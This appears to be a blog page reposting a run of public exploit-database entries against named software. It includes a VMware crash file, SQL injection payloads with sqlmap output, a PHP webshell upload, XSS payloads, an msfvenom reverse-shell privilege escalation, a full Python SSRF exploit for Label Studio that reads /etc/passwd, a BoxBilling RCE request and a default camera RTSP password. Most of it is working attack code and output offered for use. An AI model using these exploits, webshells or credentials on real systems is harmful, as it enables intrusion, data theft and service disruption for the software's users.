#Title: VMware Workstation 15 Pro - Denial of Service
#Author: Milad Karimi
#Date: 2022-10-17
#Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506)
#Affected: VMware Workstation Pro/Player 15.x
config.version = "8"
virtualHW.version = "4"
displayName = "credit's to Ex3ptionaL for find this vouln"
annotation = "Live CD ISO http://www.irongeek.com"
guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln"
guestinfo.vmware.product.url = "http://www.millw0rm.com"
guestinfo.vmware.product.short = "LCDI"
guestinfo.vmware.product.version.major = "1"
guestinfo.vmware.product.version.minor = "0"
guestinfo.vmware.product.version.revision = "0"
guestinfo.vmware.product.version.type = "release"
guestinfo.vmware.product.class = "virtual machine"
guestinfo.vmware.product.build = "1.0.0rc8-20051212"
uuid.action = "create"
guestOS = "winxppro"
#####
# Memory
#####
memsize = "20000000000000"
# memsize = "300000000000000000000000000000"
# memsize = "400000000000000000000"
# memsize = "700000000000000000000000000000000000"
#
# Alternative larger memory allocations
#####
# USB
#####
usb.present = "TRUE"
#####
# Floppy
#####
floppy0.present = "FALSE"
#####
# IDE Storage
#####
ide1:0.present = "TRUE"
#Edit line below to change ISO to boot from
ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"
ide1:0.deviceType = "cdrom-image"
ide1:0.startConnected = "TRUE"
ide1:0.autodetect = "TRUE"
#####
# Network
#####
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
# ethernet0.connectionType = "bridged"
#
# Switch these two to enable "Bridged" vs. "NAT"
#####
# Sound
#####
sound.present = "TRUE"
sound.virtualDev = "es1371"
sound.autoDetect = "TRUE"
sound.fileName = "-1"
#####
# Misc.
#
# (normal) high
priority.grabbed = "high"
tools.syncTime = "TRUE"
workingDir = "."
#
# (16) 32 64
sched.mem.pShare.checkRate = "32"
#
# (32) 64 128
sched.mem.pshare.scanRate = "64"
#
# Higher resolution lockout, adjust values to exceed 800x600
svga.maxWidth = "8000000000000000000"
svga.maxHeight = "6000000000000000000"
#
# (F) T
isolation.tools.dnd.disable = "FALSE"
#
# (F) T
isolation.tools.hgfs.disable = "FALSE"
#
# (F) T
isolation.tools.copy.disable = "FALSE"
#
# (F) T
isolation.tools.paste.disable = "FALSE"
#
# (T) F
logging = "TRUE"
#
#
# (F) T
log.append = "FALSE"
#
# (3) number of older files kept
log.keepOld = "1"
#
# (0) microseconds
keyboard.typematicMinDelay = 100000000000000000
uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
ethernet0.addressType = "generated"
ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"
ethernet0.generatedAddressOffset = "0"
checkpoint.vmState = "live-cd-iso.vmss"
tools.remindInstall = "TRUE"
Exploit code()
buffer = "A" * 118000000000000000
payload = buffer
try:
f=open("PoC.vmx","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863117626
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-31
# Vendor Homepage: https://www.youphptube.com/
# Software Link : https://www.youphptube.com/
# Tested Version: 7.8
# Tested on: Windows 7, 10 using XAMPP
# Vulnerability Type: LFI + Path Traversal
CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22
Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory
traversal and Local File Inclusion through the parameter in an
/?lang=PATH+TRAVERSAL+FILE (without php) GET request because of an
include_once in locale/function.php page.
Proof of concept:
To detect: http://localhost/youphptube/index.php?lang=)
An error is generated:
Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0
in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47
In function.php page, we can see:
// filter some security here
if (!empty($_GET['lang'])) {
$_GET['lang'] = str_replace(array("'", '"', """, "'"),
array('', '', '', ''), xss_esc($_GET['lang']));
}
if (empty($_SESSION['language'])) {
$_SESSION['language'] = $config->getLanguage();
}
if (!empty($_GET['lang'])) {
$_GET['lang'] = strip_tags($_GET['lang']);
$_SESSION['language'] = $_GET['lang'];
}
@include_once
"{$global['systemRootPath']}locale/{$_SESSION['language']}.php";
The parameter "lang" can be modified and load a php file in the server.
In Document root: /phpinfo.php with this content:
<?php echo phpinfo(); ?>
To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo
Note: phpinfo without ".php".
The new Path is:
@include_once "{$global['systemRootPath']}locale/../../phpinfo.php";
And you can see the PHP information into the browser.
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: YouPHPTube 7.8 and before, does not sufficiently
encode user-controlled inputs, resulting in a reflected Cross-Site
Scripting (XSS) vulnerability via the
/<YouPHPTube_path_directory>/signup?redirectUri=<XSS>, in redirectUri
parameter.
Proof of concept:
http://localhost/
<YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt>
# Exploit Title: Online shopping system advanced 1.0 - Multiple
Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-24
# Vendor Homepage:
https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link :
https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Tested Version: 1.0
# Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +
php 5.X/7.X + MySQL
# Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7
vulnerabilities
# Vulnerability Type: SQL Injection - #1
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the admin/edit_user.php, user_id parameter.
Proof of concept:
Save this content in a file:
POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 489
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id
(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to
keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 115
HTTP(s) requests:
---
Parameter: MULTIPART user_id ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: -----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25' AND SLEEP(5) AND 'HGWF'='HGWF
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
---
[16:25:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
# Vulnerability Type: SQL Injection - #2
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the action.php, proId parameter.
Proof of concept:
Save this content in a file:
POST http://127.0.0.1/online/action.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Host: 127.0.0.1
addToCart=1&proId=70
And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId
POST parameter 'proId' is vulnerable. Do you want to keep testing the
others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 72
HTTP(s) requests:
---
Parameter: proId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv
---
[16:03:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
# Vulnerability Type: Remote Command Execution (RCE)
CVSS v3: 9.8
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434
Vulnerability description: File Restriction Bypass vulnerabilities were
found in Online shopping system advanced v1.0. This allows for an
authenticated user to potentially obtain RCE via webshell.
Proof of concept:
1. Go the add product >> (admin/add_product.php)
2.- Select product image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.php
5. Alter request in the upload...
Update 'filename' to desired extension. ex: shell.php
Not neccesary change content type to 'image/png'
Example exploitation request:
====================================================================================================
POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------184982084830387
Content-Length: 960
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_product.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_name"
demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="details"
demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="picture"; filename="shell.php"
Content-Type: image/gif
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
-----------------------------184982084830387
Content-Disposition: form-data; name="price"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_type"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="brand"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="tags"
Summet
-----------------------------184982084830387
Content-Disposition: form-data; name="submit"
-----------------------------184982084830387--
====================================================================================================
6. To view the webshell path go to Product List (admin/cosmetics_list.php)
7. Send the request and visit your new webshell
Ex:
http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami
nt authority\system
# Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in
multiple parameter.
Proof of concept:
Stored:
POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 496
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
</td><script>alert(1);</script><td>
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
# Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in
multiple parameter.
Proof of concept:
Stored:
POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_user.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=
# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1
CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in
page parameter.
Proof of concept:
Reflected:
http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2
CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php,
in page parameter.
Proof of concept:
Reflected:
http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS)
# Date: 2022-10-19
# Author: Behrouz Mansoori
# Software Link: https://wordpress.org/plugins/jetpack
# Version: 11.4
# Tested on: Mac m1
# CVE: N/A
1. Description:
This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert(document.cookie)</script>
# Exploit Title: SuperMailer v11.20 - Buffer overflow DoS
# Exploit Author: Rafael Pedrero
# Discovery Date: 2021-02-07
# Vendor Homepage:
https://int.supermailer.de/download_newsletter_software.htm
# Software Link : https://int.supermailer.de/smintsw.zip /
https://int.supermailer.de/smintsw_x64.zip
# Tested Version: v11.20 32bit/64bit [11.20.0.2204]
# Tested on: Windows 7, 10
CVSS v3: 3.3
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
CWE: CWE-20
Vulnerability description: A vulnerability in Newsletter Software
SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to
cause a process crash resulting in a Denial of service (DoS) condition for
the application on an affected system. The vulnerability exists due to
insufficient validation of certain elements with a configuration file
malformed. An attacker could exploit this vulnerability by sending a user a
malicious SMB (configuration file) file through a link or email attachment
and persuading the user to open the file with the affected software on the
local system. A successful exploit could allow the attacker to cause the
application to crash when trying to load the malicious file.
Proof of concept:
1.- Go to File -> Save program options...
2.- Save the file (default extension *.smb)
3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb
file
Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41 ........©å~AAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000B0 41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00 AA—™å@..........
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000E0 00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00 ......k...S.o.f.
000000F0 74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00 t.w.a.r.e.\.M.i.
00000100 72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00 r.k.o. .B.o.e.e.
00000110 72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 r. .S.o.f.t.w.a.
00000120 72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00 r.e.\.S.u.p.e.r.
00000130 4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00 M.a.i.l.e.r.\.T.
00000140 65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00 e.s.t. .E.M.a.i.
00000150 6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 l. .A.d.d.r.e.s.
00000160 73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00 s.e.s...........
And save the file.
4.- Go to File -> Restore program options...
5.- The application "sm.exe" crash.
# Exploit Title: HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path
# Exploit Author: Jorge Manuel Lozano Gómez
# Date: 2022-10-19
# Vendor Homepage: https://www.panterasoft.com
# Software Link: https://hdd-health.softonic.com
# Version : 4.2.0.112
# Tested on: Windows 11 64bit
# CVE : N/A
About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
Description:
==============================
HDD Health installs a service with an unquoted service path.
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
# PoC
===========
1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc "HDDHealth" ]
4. The command would return..
C:\>sc qc "HDDHealth"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HDDHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\HDD Health\HDDHealthService.exe
LOAD_ORDER_GROUP :
TAG : 0
ISPLAY_NAME : HDDHealth
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. This concludes that the service is running as SYSTEM.
6. Now create a payload with msfvenom or other tools and name it to HDDHealthService.exe.
7. Make sure you have write permissions to "C:\Program Files (x86)\HDD Health" directory.
8. Provided that you have right permissions, drop the HDDHealthService.exe executable you created into the "C:\Program Files (x86)\HDD Health" directory.
9. Start a listener.
9. Now restart the HDDHealth service by giving coommand [ sc stop HDDHealth ] followed by [ sc start HDDHealth ]
9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
10. Got shell.
During my testing :
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o HDDHealthService.exe
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
# Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
# Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"
# Date: 2022-10-03
# Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com
# Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/
# Software Link: https://github.com/heartexlabs/label-studio/releases
# Version: <=1.5.0
# CVE : CVE-2022-36551
# Docker Container: heartexlabs/label-studio
# Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition
# versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system.
# Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote
# attacker to create a new account and then exploit the SSRF.
#
# This exploit has been tested on Label Studio 1.5.0
#
# Exploit Usage Examples (replace with your target details):
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3
import json
import argparse
import requests
import shutil
from urllib.parse import urljoin
from urllib.parse import urlparse
requests.packages.urllib3.disable_warnings()
# main function for exploit
def main(url, filePath, writePath, username, password, shouldRegister):
# check if the URL is reachable
try:
r = requests.get(url, verify=False)
if r.status_code == 200:
print("[+] URL is reachable")
else:
print("[!] Error: URL is not reachable, check the URL and try again")
exit(1)
except requests.exceptions.RequestException as e:
print("[!] Error: URL is not reachable, check the URL and try again")
exit(1)
session = requests.Session()
login(session, url, username, password, shouldRegister)
print("[+] Logged in")
print("[+] Creating project...")
# Create a temp project
projectDetails = create_project(session, url)
print("[+] Project created, ID: {}".format(projectDetails["id"]))
#time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ)
print("[+] Attempting to fetch: {}".format(filePath))
fetch_file(session, url, projectDetails["id"], filePath, writePath)
print("[+] Deleting Project.. {}".format(projectDetails["id"]))
delete_project(session, url, projectDetails["id"])
print("[+] Project Deleted")
print("[*] Finished executing exploit")
# login, logs the user in
def login(session, url, username, password, shouldRegister):
# hit the main page first to get the CSRF token set
r = session.get(url, verify=False)
r = session.post(
urljoin(url, "/user/login"),
data={
"email": username,
"password": password,
"csrfmiddlewaretoken": session.cookies["csrftoken"],
},
verify=False
)
if r.status_code == 200 and r.text.find("The email and password you entered") < 0:
return
elif r.text.find("The email and password you entered") > 0 and shouldRegister:
print("[!] Account does not exist, registering...")
r = session.post(
urljoin(url, "/user/signup/"),
data={
"email": username,
"password": password,
"csrfmiddlewaretoken": session.cookies["csrftoken"],
'allow_newsletters': False,
},
)
if r.status_code == 302:
# at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)
return
else:
print("[!] Error: Could not login, check the credentials and try again")
exit(1)
# create_project creates a temporary project for exploiting the SSRF
def create_project(session, url):
r = session.post(
urljoin(url, "/api/projects"),
data={
"title": "TPS Report Finder",
},
verify=False
)
if r.status_code == 200 or r.status_code == 201:
return r.json()
else:
print("[!] Error: Could not create project, check your credentials / permissions")
exit(1)
def fetch_file(session, url, projectId, filePath, writePath):
# if scheme is empty prepend file://
parsedFilePath = urlparse(filePath)
if parsedFilePath.scheme == "":
filePath = "file://" + filePath
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
url = urljoin(url, "/api/projects/{}/import".format(projectId))
r = session.post(url,
data={
"url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL
},
headers=headers,
verify=False
)
if r.status_code == 201:
# file found! -- first grab the file path details
fileId = r.json()["file_upload_ids"][0]
r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)
r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)
print("[+] File found!")
# if user wants to write to disk, make it so
if writePath != None:
print("[+] Writing to {}".format(writePath))
# write the file to disk
with open(writePath, 'wb') as handle:
shutil.copyfileobj(r.raw, handle)
handle.close()
return
else:
print("==========================================================")
print(r.text)
print("==========================================================")
return
else:
print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")
print("\t" + r.json()["validation_errors"]["non_field_errors"][0])
return
def delete_project(session, url, projectId):
url = urljoin(url, "/api/projects/{}".format(projectId))
r = session.delete(url, verify=False)
if r.status_code == 200 or r.status_code == 204:
return
else:
print( "[!] Error: Could not delete project, check your credentials / permissions")
exit(1)
parser = argparse.ArgumentParser()
parser.add_argument("--url", required=True, help="Label Studio URL")
parser.add_argument("--file", required=True, help="Path to the file you want to fetch")
parser.add_argument("--out", required=False, help="Path to write the file. If omitted will be written to STDOUT")
parser.add_argument("--username", required=False, help="Username for existing account (email)")
parser.add_argument("--password", required=False, help="Password for existing account")
parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",
)
args = parser.parse_args()
main(args.url, args.file, args.out, args.username, args.password, args.register)
# Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)
# Date: 2022-09-18
# Exploit Author: zetc0de
# Vendor Homepage: https://www.boxbilling.org/
# Software Link:
https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip
# Version: <=4.22.1.5 (Latest)
# Tested on: Windows 10
# CVE : CVE-2022-3552
# BoxBilling was vulnerable to Unrestricted File Upload.
# In order to exploit the vulnerability, an attacker must have a valid
authenticated session as admin on the CMS.
# With at least 1 order of product an attacker can upload malicious file to
hidden API endpoint that contain a webshell and get RCE
###################################################################################
## POC
POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: local.com:8089
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
Connection: close
order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>
POC Video :
https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
# Exploit Title: Tapo C310 RTSP server v1.3.0- Unauthorised Video Stream Access
# Date: 19th July 2022
# Exploit Author: dsclee1
# Vendor Homepage: tp-link.com
# Software Link: http://download.tplinkcloud.com/firmware/Tapo_C310v1_en_1.3.0_Build_220328_Rel.64283n_u_1649923652150.bin
# Version: 1.3.0
# Tested on: Linux – running on camera
# CVE : CVE-2022-37255
These Tapo cameras work via an app. There is a facility on the app to set up a “Camera Account”, which adds user details for the RTSP server. Unfortunately if you don’t set up the user details on versions 1.3.0 and below there are default login details. I sourced these from the “cet” binary on the camera.
You can gain unauthorised access to the RTSP stream using the following user details:
User: ---
Password: TPL075526460603
# Exploit Title: SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
